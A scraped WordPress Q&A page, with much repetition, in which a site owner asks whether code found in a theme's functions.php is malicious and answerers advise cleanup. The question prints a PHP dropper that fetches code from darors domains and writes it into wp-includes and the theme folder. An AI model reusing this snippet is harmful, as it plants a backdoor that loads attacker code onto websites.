Is this a hacking script in function.php?2019 Community Moderator ElectionIs using eval() ok in this scenarioPrevent Hacking of Wordpress SiteWhere do hackers usually run their hacking script?Updating From Mobile App - Exposing Site to HackingLoad files contentWhy is file_get_contents returning page source?Hacked WordPress website, as notified by Google Search Console, what to do?Adding function to child theme's function.phpCan't save php string to a custom fieldHacked site. Fixed. Nailing down the cause

Writing rule stating superpower from different root cause is bad writing

"to be prejudice towards/against someone" vs "to be prejudiced against/towards someone"

Minkowski space

Why Is Death Allowed In the Matrix?

What does "Puller Prush Person" mean?

Languages that we cannot (dis)prove to be Context-Free

How is it possible to have an ability score that is less than 3?

Can divisibility rules for digits be generalized to sum of digits

Is it possible to do 50 km distance without any previous training?

can i play a electric guitar through a bass amp?

How is the claim "I am in New York only if I am in America" the same as "If I am in New York, then I am in America?

Font hinting is lost in Chrome-like browsers (for some languages )

tikz: show 0 at the axis origin

Do I have a twin with permutated remainders?

How could an uplifted falcon's brain work?

I’m planning on buying a laser printer but concerned about the life cycle of toner in the machine

Approximately how much travel time was saved by the opening of the Suez Canal in 1869?

Theorems that impeded progress

Is it tax fraud for an individual to declare non-taxable revenue as taxable income? (US tax laws)

Show that if two triangles built on parallel lines, with equal bases have the same perimeter only if they are congruent.

Do VLANs within a subnet need to have their own subnet for router on a stick?

Collect Fourier series terms

Why was the small council so happy for Tyrion to become the Master of Coin?

Is it unprofessional to ask if a job posting on GlassDoor is real?



Is this a hacking script in function.php?



2019 Community Moderator ElectionIs using eval() ok in this scenarioPrevent Hacking of Wordpress SiteWhere do hackers usually run their hacking script?Updating From Mobile App - Exposing Site to HackingLoad files contentWhy is file_get_contents returning page source?Hacked WordPress website, as notified by Google Search Console, what to do?Adding function to child theme's function.phpCan't save php string to a custom fieldHacked site. Fixed. Nailing down the cause



.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty margin-bottom:0;








2















I have code like below in neve theme WordPress. I feel suspicious about this code



$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false)

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);







elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false )

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);






elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {









share|improve this question






















  • It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

    – ceejayoz
    Apr 3 at 19:15











  • That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?

    – butlerblog
    2 days ago











  • @butlerblog Again, without the contents of that code.php file it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.

    – ceejayoz
    2 days ago











  • I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.

    – butlerblog
    2 days ago

















2















I have code like below in neve theme WordPress. I feel suspicious about this code



$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false)

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);







elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false )

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);






elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {









share|improve this question






















  • It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

    – ceejayoz
    Apr 3 at 19:15











  • That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?

    – butlerblog
    2 days ago











  • @butlerblog Again, without the contents of that code.php file it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.

    – ceejayoz
    2 days ago











  • I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.

    – butlerblog
    2 days ago













2












2








2


2






I have code like below in neve theme WordPress. I feel suspicious about this code



$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false)

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);







elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false )

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);






elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {









share|improve this question














I have code like below in neve theme WordPress. I feel suspicious about this code



$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false)

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);







elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false )

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);






elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {






php hacked






share|improve this question













share|improve this question











share|improve this question




share|improve this question










asked Apr 3 at 16:49









Latheesh V M VillaLatheesh V M Villa

3541220




3541220












  • It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

    – ceejayoz
    Apr 3 at 19:15











  • That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?

    – butlerblog
    2 days ago











  • @butlerblog Again, without the contents of that code.php file it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.

    – ceejayoz
    2 days ago











  • I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.

    – butlerblog
    2 days ago

















  • It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

    – ceejayoz
    Apr 3 at 19:15











  • That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?

    – butlerblog
    2 days ago











  • @butlerblog Again, without the contents of that code.php file it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.

    – ceejayoz
    2 days ago











  • I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.

    – butlerblog
    2 days ago
















It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

– ceejayoz
Apr 3 at 19:15





It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

– ceejayoz
Apr 3 at 19:15













That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?

– butlerblog
2 days ago





That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?

– butlerblog
2 days ago













@butlerblog Again, without the contents of that code.php file it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.

– ceejayoz
2 days ago





@butlerblog Again, without the contents of that code.php file it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.

– ceejayoz
2 days ago













I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.

– butlerblog
2 days ago





I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.

– butlerblog
2 days ago










3 Answers
3






active

oldest

votes


















5














I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.



So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:



  • changing all passwords (WP admins, FTP, hosting, database)

  • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.

  • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.






share|improve this answer























  • These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

    – jsmod
    Apr 3 at 18:14






  • 1





    There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

    – Rick Hellewell
    Apr 3 at 19:07






  • 1





    I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

    – Rick Hellewell
    Apr 3 at 19:14











  • Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

    – jsmod
    Apr 3 at 19:27







  • 1





    Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

    – Rick Hellewell
    Apr 3 at 19:57



















1














Yes, most probably yes.



It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.






share|improve this answer























  • Thanks for confirming I saw this in my client ..have to warn him about that.

    – Latheesh V M Villa
    Apr 3 at 16:56


















0














That's a possibility.



Although, I think it is a mechanism to push theme updates only for sites with a valid license key.



Alternatively, it is backdoor for deleting theme for any compromised key.



It is difficult to say anything for sure without looking at the content which is downloaded.






share|improve this answer








New contributor




Gaurav is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.




















    Your Answer








    StackExchange.ready(function()
    var channelOptions =
    tags: "".split(" "),
    id: "110"
    ;
    initTagRenderer("".split(" "), "".split(" "), channelOptions);

    StackExchange.using("externalEditor", function()
    // Have to fire editor after snippets, if snippets enabled
    if (StackExchange.settings.snippets.snippetsEnabled)
    StackExchange.using("snippets", function()
    createEditor();
    );

    else
    createEditor();

    );

    function createEditor()
    StackExchange.prepareEditor(
    heartbeatType: 'answer',
    autoActivateHeartbeat: false,
    convertImagesToLinks: false,
    noModals: true,
    showLowRepImageUploadWarning: true,
    reputationToPostImages: null,
    bindNavPrevention: true,
    postfix: "",
    imageUploader:
    brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
    contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
    allowUrls: true
    ,
    onDemand: true,
    discardSelector: ".discard-answer"
    ,immediatelyShowMarkdownHelp:true
    );



    );













    draft saved

    draft discarded


















    StackExchange.ready(
    function ()
    StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fwordpress.stackexchange.com%2fquestions%2f333380%2fis-this-a-hacking-script-in-function-php%23new-answer', 'question_page');

    );

    Post as a guest















    Required, but never shown

























    3 Answers
    3






    active

    oldest

    votes








    3 Answers
    3






    active

    oldest

    votes









    active

    oldest

    votes






    active

    oldest

    votes









    5














    I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.



    So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:



    • changing all passwords (WP admins, FTP, hosting, database)

    • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.

    • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

    There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.






    share|improve this answer























    • These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

      – jsmod
      Apr 3 at 18:14






    • 1





      There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

      – Rick Hellewell
      Apr 3 at 19:07






    • 1





      I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

      – Rick Hellewell
      Apr 3 at 19:14











    • Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

      – jsmod
      Apr 3 at 19:27







    • 1





      Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

      – Rick Hellewell
      Apr 3 at 19:57
















    5














    I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.



    So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:



    • changing all passwords (WP admins, FTP, hosting, database)

    • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.

    • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

    There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.






    share|improve this answer























    • These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

      – jsmod
      Apr 3 at 18:14






    • 1





      There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

      – Rick Hellewell
      Apr 3 at 19:07






    • 1





      I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

      – Rick Hellewell
      Apr 3 at 19:14











    • Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

      – jsmod
      Apr 3 at 19:27







    • 1





      Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

      – Rick Hellewell
      Apr 3 at 19:57














    5












    5








    5







    I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.



    So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:



    • changing all passwords (WP admins, FTP, hosting, database)

    • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.

    • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

    There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.






    share|improve this answer













    I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.



    So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:



    • changing all passwords (WP admins, FTP, hosting, database)

    • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.

    • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

    There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.







    share|improve this answer












    share|improve this answer



    share|improve this answer










    answered Apr 3 at 16:56









    Rick HellewellRick Hellewell

    4,00821025




    4,00821025












    • These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

      – jsmod
      Apr 3 at 18:14






    • 1





      There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

      – Rick Hellewell
      Apr 3 at 19:07






    • 1





      I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

      – Rick Hellewell
      Apr 3 at 19:14











    • Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

      – jsmod
      Apr 3 at 19:27







    • 1





      Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

      – Rick Hellewell
      Apr 3 at 19:57


















    • These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

      – jsmod
      Apr 3 at 18:14






    • 1





      There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

      – Rick Hellewell
      Apr 3 at 19:07






    • 1





      I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

      – Rick Hellewell
      Apr 3 at 19:14











    • Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

      – jsmod
      Apr 3 at 19:27







    • 1





      Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

      – Rick Hellewell
      Apr 3 at 19:57

















    These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

    – jsmod
    Apr 3 at 18:14





    These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

    – jsmod
    Apr 3 at 18:14




    1




    1





    There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

    – Rick Hellewell
    Apr 3 at 19:07





    There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

    – Rick Hellewell
    Apr 3 at 19:07




    1




    1





    I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

    – Rick Hellewell
    Apr 3 at 19:14





    I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

    – Rick Hellewell
    Apr 3 at 19:14













    Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

    – jsmod
    Apr 3 at 19:27






    Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

    – jsmod
    Apr 3 at 19:27





    1




    1





    Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

    – Rick Hellewell
    Apr 3 at 19:57






    Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

    – Rick Hellewell
    Apr 3 at 19:57














    1














    Yes, most probably yes.



    It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.






    share|improve this answer























    • Thanks for confirming I saw this in my client ..have to warn him about that.

      – Latheesh V M Villa
      Apr 3 at 16:56















    1














    Yes, most probably yes.



    It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.






    share|improve this answer























    • Thanks for confirming I saw this in my client ..have to warn him about that.

      – Latheesh V M Villa
      Apr 3 at 16:56













    1












    1








    1







    Yes, most probably yes.



    It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.






    share|improve this answer













    Yes, most probably yes.



    It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.







    share|improve this answer












    share|improve this answer



    share|improve this answer










    answered Apr 3 at 16:52









    Krzysiek DróżdżKrzysiek Dróżdż

    18.5k73249




    18.5k73249












    • Thanks for confirming I saw this in my client ..have to warn him about that.

      – Latheesh V M Villa
      Apr 3 at 16:56

















    • Thanks for confirming I saw this in my client ..have to warn him about that.

      – Latheesh V M Villa
      Apr 3 at 16:56
















    Thanks for confirming I saw this in my client ..have to warn him about that.

    – Latheesh V M Villa
    Apr 3 at 16:56





    Thanks for confirming I saw this in my client ..have to warn him about that.

    – Latheesh V M Villa
    Apr 3 at 16:56











    0














    That's a possibility.



    Although, I think it is a mechanism to push theme updates only for sites with a valid license key.



    Alternatively, it is backdoor for deleting theme for any compromised key.



    It is difficult to say anything for sure without looking at the content which is downloaded.






    share|improve this answer








    New contributor




    Gaurav is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
    Check out our Code of Conduct.
























      0














      That's a possibility.



      Although, I think it is a mechanism to push theme updates only for sites with a valid license key.



      Alternatively, it is backdoor for deleting theme for any compromised key.



      It is difficult to say anything for sure without looking at the content which is downloaded.






      share|improve this answer








      New contributor




      Gaurav is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
      Check out our Code of Conduct.






















        0












        0








        0







        That's a possibility.



        Although, I think it is a mechanism to push theme updates only for sites with a valid license key.



        Alternatively, it is backdoor for deleting theme for any compromised key.



        It is difficult to say anything for sure without looking at the content which is downloaded.






        share|improve this answer








        New contributor




        Gaurav is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
        Check out our Code of Conduct.










